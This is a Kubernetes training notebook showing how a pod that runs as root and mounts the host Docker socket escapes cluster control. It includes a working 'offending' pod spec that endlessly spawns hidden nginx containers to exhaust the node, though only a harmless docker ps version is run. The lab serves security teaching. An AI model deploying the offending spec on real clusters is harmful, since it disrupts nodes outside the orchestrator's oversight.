**This notebook covered by the following [license](License.ipynb)  This note must not be removed**

# Cloudbomb


## Purpose

It is shown, how dangerous it is 

* to start an image from an untrusted source
* with __root privileges__
* and __access to the host file system__

This examples destroys the cluster step by step. 

It is a dangerous example, turned _s l o w_ for didactic purposes.

It can even be made more disruptive easily.

Don't put images like this into public registries.


#### Create an empty directory and change into

In [1]:
mkdir -p cloudbomb
cd cloudbomb

mkdir: cannot create directory 'cloudbomb': File exists


In [3]:
pwd

/minikube-host/training/notebooks/cloudbomb


#### Get Docker

See the latest statically linked versions here
https://download.docker.com/linux/static/stable/x86_64/

In [4]:
curl https://download.docker.com/linux/static/stable/x86_64/docker-19.03.8.tgz -o docker.tgz

  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
100 60.7M  100 60.7M    0     0  21.8M      0  0:00:02  0:00:02 --:--:-- 21.8M


In [5]:
tar tzf docker.tgz

docker/
docker/containerd
docker/docker
docker/ctr
docker/dockerd
docker/runc
docker/docker-proxy
docker/docker-init
docker/containerd-shim


In [6]:
pwd

/minikube-host/training/notebooks/cloudbomb


In [7]:
tar xzf docker.tgz

### Create the Dockerfile

and build the image **inside minikube**

In [8]:
cat > Dockerfile <<EOF
FROM alpine

COPY docker/docker /usr/bin

CMD ["docker", "ps"]
EOF
cat Dockerfile

FROM alpine

COPY docker/docker /usr/bin

CMD ["docker", "ps"]


In [9]:
docker images

REPOSITORY                                TAG        IMAGE ID       CREATED         SIZE
nginx                                     latest     f6d0b4767a6c   2 weeks ago     133MB
nginxinc/nginx-unprivileged               latest     b34dace3569f   5 weeks ago     133MB
kubernetesui/dashboard                    v2.1.0     9a07b5b4bfac   6 weeks ago     226MB
k8s.gcr.io/kube-proxy                     v1.20.0    10cc881966cf   6 weeks ago     118MB
k8s.gcr.io/kube-scheduler                 v1.20.0    3138b6e3d471   6 weeks ago     46.4MB
k8s.gcr.io/kube-controller-manager        v1.20.0    b9fa1895dcaa   6 weeks ago     116MB
k8s.gcr.io/kube-apiserver                 v1.20.0    ca9843d3b545   6 weeks ago     122MB
gcr.io/k8s-minikube/storage-provisioner   v4         85069258b98a   7 weeks ago     29.7MB
k8s.gcr.io/etcd                           3.4.13-0   0369cf4303ff   5 months ago    253MB
k8s.gcr.io/coredns                        1.7.0      bfe3a36ebd25   7 months ago    45.2MB
kubernet

In [10]:
docker build . -t cloudbomb

Sending build context to Docker daemon  274.7MB
Step 1/3 : FROM alpine
latest: Pulling from library/alpine

Digest: sha256:d9a7354e3845ea8466bb00b22224d9116b183e594527fb5b6c3d30bc01a20378
Status: Downloaded newer image for alpine:latest
 ---> 7731472c3f2a
Step 2/3 : COPY docker/docker /usr/bin
 ---> 57a3970282d7
Step 3/3 : CMD ["docker", "ps"]
 ---> Running in 538fc970d206
Removing intermediate container 538fc970d206
 ---> 55cfdcadd3ec
Successfully built 55cfdcadd3ec
Successfully tagged cloudbomb:latest


#### Check the images

`grep -E ... ` is only for colouring 

In [11]:
docker images | grep --color=always -E '$|cloudbomb.*$' 

REPOSITORY                                TAG        IMAGE ID       CREATED          SIZE
cloudbomb                                 latest     55cfdcadd3ec   22 seconds ago   71.4MB
alpine                                    latest     7731472c3f2a   11 days ago      5.61MB
nginx                                     latest     f6d0b4767a6c   2 weeks ago      133MB
nginxinc/nginx-unprivileged               latest     b34dace3569f   5 weeks ago      133MB
kubernetesui/dashboard                    v2.1.0     9a07b5b4bfac   6 weeks ago      226MB
k8s.gcr.io/kube-proxy                     v1.20.0    10cc881966cf   6 weeks ago      118MB
k8s.gcr.io/kube-apiserver                 v1.20.0    ca9843d3b545   6 weeks ago      122MB
k8s.gcr.io/kube-controller-manager        v1.20.0    b9fa1895dcaa   6 weeks ago      116MB
k8s.gcr.io/kube-scheduler                 v1.20.0    3138b6e3d471   6 weeks ago      46.4MB
gcr.io/k8s-minikube/storage-provisioner   v4         85069258b98a   7 weeks ago      29.

## Create the Cloudbomb Pod

* it is mounting the Docker socket `/var/run/docker.sock` into the container, we have `hostPath` rights
* the `docker` process is running as `root`
* **Gotcha**

# Offending version, don't use

```yaml
apiVersion: v1
kind: Pod
metadata:
  name: cloudbomb 
spec:
  containers:
  - image: cloudbomb
    imagePullPolicy: IfNotPresent
    command:
      - /bin/sh
      - "-c" 
      - "while true; \
           do \   
             docker run -d --name BOOM_\$(cat /dev/urandom | \
             tr -cd 'a-f0-9' | \
             head -c 6) nginx ; \
             sleep 10 ; \
           done"
    name: cloudbomb
    volumeMounts:
    - mountPath: /var/run/docker.sock
      name: docker-socket
  volumes:
  - name: docker-socket
    hostPath:
      path: /var/run/docker.sock
      type: Socket
```

# Soft version

In [12]:
kubectl create -f - <<EOF
apiVersion: v1
kind: Pod
metadata:
  name: cloudbomb 
spec:
  containers:
  - image: cloudbomb
    imagePullPolicy: IfNotPresent
    command:
      - /bin/sh
      - "-c" 
      - "while true; \
           do \   
             docker ps ; \
             sleep 10 ; \
           done"
    name: cloudbomb
    volumeMounts:
    - mountPath: /var/run/docker.sock
      name: docker-socket
  volumes:
  - name: docker-socket
    hostPath:
      path: /var/run/docker.sock
      type: Socket
EOF

pod/cloudbomb created


In [13]:
kubectl get pods

NAME                            READY   STATUS              RESTARTS   AGE
cloudbomb                       0/1     ContainerCreating   0          1s
nginx-strict-5cdc48cf55-f5r5l   1/1     Running             0          3h45m
nginx-strict-5cdc48cf55-v72v5   1/1     Running             0          3h45m
nginx-strict-5cdc48cf55-xkh98   1/1     Running             0          3h45m


In [14]:
kubectl wait --for=condition=ready --timeout=10s pod/cloudbomb

pod/cloudbomb condition met


In [15]:
kubectl get pods

NAME                            READY   STATUS    RESTARTS   AGE
cloudbomb                       1/1     Running   0          6s
nginx-strict-5cdc48cf55-f5r5l   1/1     Running   0          3h45m
nginx-strict-5cdc48cf55-v72v5   1/1     Running   0          3h45m
nginx-strict-5cdc48cf55-xkh98   1/1     Running   0          3h45m


In [17]:
kubectl logs cloudbomb

CONTAINER ID        IMAGE                         COMMAND                  CREATED                  STATUS                  PORTS               NAMES
05023ceb4f59        55cfdcadd3ec                  "/bin/sh -c 'while t…"   Less than a second ago   Up Less than a second                       k8s_cloudbomb_cloudbomb_default_7d9ed0e8-219a-4afe-a24c-ee934f434023_0
bd453f2dac29        k8s.gcr.io/pause:3.2          "/pause"                 1 second ago             Up Less than a second                       k8s_POD_cloudbomb_default_7d9ed0e8-219a-4afe-a24c-ee934f434023_0
dc3f93033f03        nginxinc/nginx-unprivileged   "/docker-entrypoint.…"   4 hours ago              Up 4 hours                                  k8s_nginx_nginx-strict-5cdc48cf55-v72v5_default_40e29b43-4a1e-430a-9e5c-c6acf05a54cf_0
9fda29057549        nginxinc/nginx-unprivileged   "/docker-entrypoint.…"   4 hours ago              Up 4 hours                                  k8s_nginx_nginx-strict-5cdc48cf55-f5r5l_default_010

# Docker is 💩, let us use `cri-o`

Doesn' solve the principle problem

## Docker vs Kubernetes

The docker command bypasses Kubernetes. It is *not* visible to the `kubelet` and the `api-server`

It will kill the node _s l o w l y_

In [ ]:
docker ps | grep -E '$|.*BOOM.*$'

## Kube-Scan

Examine the pod with [Octarine Kube-Scan](https://github.com/octarinesec/kube-scan)

Open a separate terminal window and run `minikube tunnel` in this terminal

In [1]:
kubectl apply -f https://raw.githubusercontent.com/octarinesec/kube-scan/master/kube-scan.yaml

namespace/kube-scan created
configmap/kube-scan created
serviceaccount/kube-scan created
clusterrole.rbac.authorization.k8s.io/kube-scan created
clusterrolebinding.rbac.authorization.k8s.io/kube-scan created
deployment.apps/kube-scan created
service/kube-scan-ui created


In [2]:
kubectl wait -n kube-scan --for=condition=available deployment/kube-scan

deployment.apps/kube-scan condition met


In [3]:
kubectl apply -f https://raw.githubusercontent.com/octarinesec/kube-scan/master/kube-scan-lb.yaml

namespace/kube-scan unchanged
configmap/kube-scan unchanged
serviceaccount/kube-scan unchanged
clusterrole.rbac.authorization.k8s.io/kube-scan configured
clusterrolebinding.rbac.authorization.k8s.io/kube-scan configured
deployment.apps/kube-scan unchanged
service/kube-scan-ui configured


In [4]:
echo http://$(kubectl -n kube-scan get service kube-scan-ui -o jsonpath={..ip})

http://10.96.191.79


# Risk Score

Current 5, should be 8-9 

I own the node, no network access

# Cleanup

In [ ]:
kubectl delete pod cloudbomb

In [ ]:
kubectl delete -f https://raw.githubusercontent.com/octarinesec/kube-scan/master/kube-scan.yaml -f https://raw.githubusercontent.com/octarinesec/kube-scan/master/kube-scan-lb.yaml